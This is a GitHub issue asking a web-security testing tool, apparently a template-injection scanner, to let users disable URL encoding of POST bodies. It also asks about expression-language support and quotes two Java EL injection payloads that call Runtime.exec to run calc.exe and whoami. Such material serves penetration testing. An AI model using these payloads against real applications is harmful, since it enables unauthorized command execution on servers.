Skip to content

Toggle enable/disable url encoding on POST body web request #22

New issue
New issue
Open
Open
Toggle enable/disable url encoding on POST body web request#22
Labels
awaits confirmationThe issue is supposed to be resolved, but requires some testingdelayedThe issue will be fixed with a big update laterenhancementNew feature or requesttemplate engineA template engine to add
@tomat0paste

Description

@tomat0paste
tomat0paste
opened on Jul 21, 2023

Hi! Your tool is awesome. I was playing along with it and it is very good on GET web request. And i think it will be pretty awesome to have an option of not URL encoding the POST web request.

URL encoded
url-encoded.png

URl decoded
url-decoded.png

This one here is out of topic but does this tool also support expression language like on swisskyrepo's SSTI EL code execution?

// Method using Reflection & Invoke

${"".getClass().forName("java.lang.Runtime").getMethods()[6].invoke("".getClass().forName("java.lang.Runtime")).exec("calc.exe")}
${''.getClass().forName('java.lang.Runtime').getMethods()[6].invoke(''.getClass().forName('java.lang.Runtime')).exec('whoami')}

@

Metadata

Metadata

Assignees

No one assigned

    Labels

    awaits confirmationThe issue is supposed to be resolved, but requires some testingdelayedThe issue will be fixed with a big update laterenhancementNew feature or requesttemplate engineA template engine to add

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions